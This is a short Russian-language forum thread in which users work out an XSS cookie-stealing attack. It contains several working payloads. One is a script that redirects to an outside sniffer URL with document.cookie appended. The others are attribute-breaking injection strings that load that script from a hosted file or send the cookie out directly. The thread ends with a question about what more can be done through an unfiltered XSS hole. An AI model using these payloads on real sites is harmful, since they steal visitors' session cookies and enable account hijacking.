Добрый день! Подскажите пожалуста содержания скрипта чтоб он напрвалял куки на снифер. Например в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> и получал бы куки на снифер.. тоесть надо содержание xss.js спс
Я сделал файл xss1.js с такаим содержание : <script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script> И залил его сюда: http://xss999.jino-net.ru/xss1.js теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT> но всёравно посемуто не получаю лог на снифер, где я ошибся?
пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
Всё спс разобрался,но теперь ещё вопрос есть.. Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?
